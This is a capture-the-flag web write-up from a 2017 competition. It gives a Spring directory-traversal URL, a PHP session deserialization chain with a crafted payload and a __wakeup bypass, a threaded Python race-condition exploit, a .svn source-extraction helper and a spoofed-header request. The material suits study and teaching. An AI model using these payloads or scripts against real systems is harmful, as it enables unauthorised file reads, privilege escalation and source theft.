2017 First Global Chinese Cybersecurity Skills Competition - web writeup

Category: programming tools · Published: 7 years ago


springcss

https://github.com/ilmila/springcss-cve-2014-3625

CVE-2014-3625 is a directory traversal in Spring Framework's static resource handling (affected: 3.x before 3.2.12, 4.0.x before 4.0.8, 4.1.x before 4.1.2): a path segment such as file:/etc/flag is resolved as a file-system resource, so the flag can be read with: http://218.2.197.232:18015/spring-css/resources/file:/etc/flag

PHP deserialization

http://wooyun.jozxing.cc/static/drops/tips-3909.html

$_SESSION is written with the php_serialize handler and read back with the php handler. php_serialize stores the whole $_SESSION array as a single serialize() string; the php handler instead expects name|serialized_value pairs and treats the first | as the separator. A value containing | that was stored by php_serialize is therefore read back by the php handler as a variable name followed by attacker-chosen serialized data, which goes straight into unserialize().

By injecting a | character, the serialized form of an arbitrary object can thus be forged.

<?php
$FLAG = "flag{aaaaaaaa}";
class TOPA {
    public $token;
    public $ticket;
    public $username;
    public $password;
    function __toString() {
        if ($this->username == 'aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb') {
            return 'key is:{' . $this->token . '}' . "\n";
        }
    }
}
class TOPB {
    public $obj;
    public $attr;
    function __construct() {
        $this->attr = null;
        $this->obj = null;
    }
    function __toString() {
        global $FLAG;                            // assumed: the listing as captured omits this, but the chain relies on $FLAG reaching token
        $this->obj = unserialize($this->attr);   // second, attacker-controlled unserialize()
        $this->obj->token = $FLAG;
        if ($this->obj->token === $this->obj->ticket) {
            return (string) $this->obj;          // triggers TOPA::__toString()
        }
    }
}
class TOPC {
    public $obj;
    public $attr;
    function __wakeup() {        // runs on unserialize() and wipes attr, unless bypassed
        $this->attr = null;
        $this->obj = null;
    }
    function __destruct() {
        echo $this->attr;        // echoing an object calls its __toString()
    }
}

Exploit chain: TOPC::__destruct() echoes $attr; if $attr is a TOPB object, that calls TOPB::__toString(), which in turn calls TOPA::__toString() through the (string) cast.

This involves two problems. First, TOPC::__wakeup() nulls out $attr; it can be bypassed by making the declared property count in the serialized string larger than the real number of properties (CVE-2016-7124, fixed in PHP 5.6.25 / 7.0.10). Second, $this->obj->token === $this->obj->ticket has to hold even though token is overwritten with $FLAG after unserialize().

The second one is solved with &: make ticket a reference to token, so both always hold the same value.

<?php
$b = new TOPA;
$b->token = null;
$b->ticket = &$b->token;   // serialized as R:2, a reference to the token slot
$b->username = 'aaaaaaaaaaaaaaaaa';
$b->password = 'bbbbbbbbbbbbbbbbbb';
echo serialize($b) . "\n\n";

$a = new TOPB;
// TOPB::__toString() unserializes attr itself, so the TOPA payload is embedded as a string
$a->attr = 'O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";s:17:"aaaaaaaaaaaaaaaaa";s:8:"password";s:18:"bbbbbbbbbbbbbbbbbb";}';
$a->obj = '';
// echo serialize($a) . "\n\n";

$c = new TOPC;
$c->attr = $a;
echo serialize($c) . "\n\n";   // prints TOPC with a property count of 2; the final payload bumps it to 4

-------------------------------
Final payload. The script prints TOPC with a property count of 2; here it has been changed by hand to 4 so that unserialize() skips __wakeup():
O:4:"TOPC":4:{s:3:"obj";N;s:4:"attr";O:4:"TOPB":2:{s:3:"obj";s:0:"";s:4:"attr";s:127:"O:4:"TOPA":4:{s:5:"token";N;s:6:"ticket";R:2;s:8:"username";s:17:"aaaaaaaaaaaaaaaaa";s:8:"password";s:18:"bbbbbbbbbbbbbbbbbb";}";}}

A new serialization marker learned here: R, a reference to an earlier slot of the same unserialize() call (slot 1 is the object itself, slot 2 is token).
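The payload above rebuilt with a small serializer, as an added example (this is not code from the writeup or from the challenge). It inflates TOPC's property count for the __wakeup bypass, embeds TOPA as a string inside TOPB, and models how the php session handler would split data written by php_serialize at the injected |. The session key name and the injection point are assumptions for illustration.

```python
# Added example (not from the writeup): build the TOPC -> TOPB -> TOPA payload
# with a minimal PHP serializer, inflate TOPC's property count to skip
# __wakeup() (CVE-2016-7124), and model the php/php_serialize handler mismatch.


def php_str(s: str) -> str:
    """PHP serialize() of a string: s:<byte length>:"<raw bytes>"; (no escaping)."""
    return f's:{len(s.encode())}:"{s}";'


def php_obj(cls: str, props, declared=None) -> str:
    """Serialize an object; props is [(name, already-serialized value)].
    `declared` overrides the property count written into the string: a count
    larger than the real number of properties makes unserialize() skip
    __wakeup() on PHP < 5.6.25 / 7.0.10 (CVE-2016-7124)."""
    count = len(props) if declared is None else declared
    body = "".join(php_str(name) + value for name, value in props)
    return f'O:{len(cls)}:"{cls}":{count}:{{{body}}}'


def topa() -> str:
    # ticket is R:2, a reference to slot 2 (token); slot 1 is the object itself.
    # Slot numbering restarts here because TOPB::__toString() runs a separate
    # unserialize() on this string, so the reference stays valid when nested.
    return php_obj("TOPA", [
        ("token", "N;"),
        ("ticket", "R:2;"),
        ("username", php_str("a" * 17)),
        ("password", php_str("b" * 18)),
    ])


def topb() -> str:
    # TOPB::__toString() calls unserialize($this->attr): TOPA is nested as a string.
    return php_obj("TOPB", [("obj", php_str("")), ("attr", php_str(topa()))])


def topc() -> str:
    # TOPC really has 2 properties; declaring 4 is the __wakeup() bypass.
    return php_obj("TOPC", [("obj", "N;"), ("attr", topb())], declared=4)


def php_serialize_session(session: dict) -> str:
    """What the php_serialize handler writes: $_SESSION as one serialized array."""
    body = "".join(php_str(k) + php_str(v) for k, v in session.items())
    return f"a:{len(session)}:{{{body}}}"


def php_handler_split(raw: str):
    """Model of the php handler's read: everything before the first '|' is the
    variable name, what follows is handed to unserialize(). Whatever is left
    after the first complete value is ignored because no further '|' follows."""
    name, _, rest = raw.partition("|")
    return name, rest


def session_injection(payload: str) -> str:
    # Assumed injection point: a session field "name" whose value we control.
    return php_serialize_session({"name": "|" + payload})


if __name__ == "__main__":
    payload = topc()
    print(payload)
    name, value = php_handler_split(session_injection(payload))
    print("variable name seen by the php handler:", name)
    print("data handed to unserialize():", value)
```

Running it prints exactly the final payload from the writeup; the name seen by the php handler is the leftover array prefix a:1:{s:4:"name";s:NNN:" and the data handed to unserialize() starts with the TOPC object, whose __destruct() then fires at the end of the request.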

Race condition

<?php
header("Content-type: text/html; charset=utf-8");
session_start();

$mysqli = new mysqli("localhost", "root", "", "gctf09");
if ($mysqli->connect_errno) {
    die("Database connection error; if this keeps happening, contact the administrator.");
}

// print the source
if(isset($_REQUEST['showcode'])){
    highlight_file(__FILE__);
    exit();

}
$user="";
// first visit: create a user
if(!isset($_SESSION["name"])){
    $user=substr(md5(uniqid().uniqid()),8,16);
    $_SESSION["name"]=$user;
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`user` (name,pass) VALUES (?,?)");
    $stmt->bind_param("ss",$user,md5($user));
    $stmt->execute();
    $stmt->close();
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`priv` (name,notadmin) VALUES (?,TRUE)");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt->close();
}else{
    $user=$_SESSION["name"];
}
// on reset, wipe the user's records and recreate them (four separate autocommitted statements)
if($_SERVER["REQUEST_METHOD"] === "POST" && $_GET['method']==="reset" && isset($_POST['password']) ){
    $stmt = $mysqli->prepare("DELETE FROM gctf09.`user` where name=?");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt = $mysqli->prepare("DELETE FROM gctf09.`priv` where name=?");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`user` (name,pass) VALUES (?,?)");
    $stmt->bind_param("ss",$user,md5($_POST['password']));
    $stmt->execute();
    $stmt->close();
    // the privilege check queries the priv table; anything other than TRUE means admin
    // window: from here until the INSERT below commits, a login with the new password finds no priv row
    $stmt = $mysqli->prepare("INSERT INTO gctf09.`priv` (name,notadmin) VALUES (?,TRUE)");
    $stmt->bind_param("s",$user);
    $stmt->execute();
    $stmt->close();
    $mysqli->close();
    die("Updated successfully");
}
$mysqli->close();
?>

Exploit script (Python). A few threads keep creating users and resetting their password, while many threads try to log in with the new password; a login that is served between the INSERT into user (new password already valid) and the INSERT into priv finds no priv row and, per the comment in the source, is treated as admin:

# coding=utf8
import requests
from bs4 import BeautifulSoup
import threading

BASE = 'http://218.2.197.242:18009/'
user = ''  # shared between threads: the most recently created user name


def exp():
    """Keep creating fresh users and resetting their password, so the reset
    branch (DELETE/INSERT on user and priv) runs as often as possible."""
    global user
    while True:
        s = requests.session()
        r = s.get(BASE)
        soup = BeautifulSoup(r.content, 'html.parser')
        user = soup.find(id="name")['value']
        print(user)

        data = {'password': 'helloworld'}
        s.post(BASE + 'index.php?method=reset', data=data)


def login():
    """Hammer the login with the new password; a request that lands between
    the INSERT into user and the INSERT into priv is treated as admin."""
    while True:
        data = {'name': user, 'password': 'helloworld'}
        r2 = requests.post(BASE + 'login.php?method=login', data=data)
        print(user, r2.content)


def main():
    threadpool = []
    for _ in range(30):
        threadpool.append(threading.Thread(target=login, daemon=True))
    for _ in range(3):
        threadpool.append(threading.Thread(target=exp, daemon=True))
    for th in threadpool:
        th.start()
    for th in threadpool:
        th.join()


if __name__ == '__main__':
    main()

Web (misc)

http://218.2.197.232:18007/

There is an exposed .svn directory, but the only way in is through wc.db: it yields the checksums (hashes) of the files, and with those the source can then be fetched.

Tool: https://github.com/anantshri/svn-extractor
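The lookup that tool automates, as an added example (not code from the writeup or from svn-extractor): read the NODES table of a downloaded wc.db and turn each file's $sha1$ checksum into the .svn/pristine/xx/<sha1>.svn-base path to GET. The wc.db here is constructed in memory with only the columns the lookup uses; a real one has many more columns and tables.

```python
# Added example (not from the writeup): map entries of an exposed .svn/wc.db
# (Subversion 1.7+ working copy format) to their pristine copies.
import sqlite3


def pristine_path(checksum: str) -> str:
    """NODES.checksum looks like '$sha1$<40 hex>'; the pristine copy of that
    file is stored at .svn/pristine/<first two hex>/<sha1>.svn-base."""
    kind, _, digest = checksum.strip("$").partition("$")
    if kind != "sha1" or len(digest) != 40:
        raise ValueError(f"unexpected checksum format: {checksum!r}")
    return f".svn/pristine/{digest[:2]}/{digest}.svn-base"


def list_files(db: sqlite3.Connection):
    """Every file recorded in wc.db, paired with the pristine path to fetch."""
    rows = db.execute(
        "SELECT local_relpath, checksum FROM NODES "
        "WHERE kind = 'file' AND checksum IS NOT NULL "
        "ORDER BY local_relpath"
    ).fetchall()
    return [(relpath, pristine_path(checksum)) for relpath, checksum in rows]


def constructed_wc_db() -> sqlite3.Connection:
    """Stand-in for a downloaded wc.db: only the NODES columns the lookup needs,
    with made-up paths and digests (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE NODES (local_relpath TEXT, kind TEXT, checksum TEXT)")
    db.executemany("INSERT INTO NODES VALUES (?, ?, ?)", [
        ("", "dir", None),
        ("index.php", "file", "$sha1$" + "ab" * 20),
        ("inc/config.php", "file", "$sha1$0123456789abcdef0123456789abcdef01234567"),
    ])
    return db


if __name__ == "__main__":
    # With a real download, replace constructed_wc_db() by sqlite3.connect("wc.db").
    for relpath, pristine in list_files(constructed_wc_db()):
        print(f"{relpath:20s} -> {pristine}")
```

Each printed pristine path, appended to the target's /.svn/ URL, is the request that returns that file's source.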

Forbidden

The request that finally gets past the checks (User-Agent, Referer, Accept-Language, cookies, X-Forwarded-For and X-Requested-With all have to match):

GET / HTTP/1.1
Host: www.topsec.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 98;.NET CLR 8)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://www.baidu.com
Accept-Encoding: gzip, deflate, sdch
Accept-Language: de-DE
Cookie: login=4e7a51334d6a63314e6a553d; PHPSESSID=h2cbas2n7mbli0hkll55sc84o7; 186221D9=1; 6EE211F6=1; 
X-Forwarded-For: localhost
x-requested-with: XMLHttpRequest
Connection: close
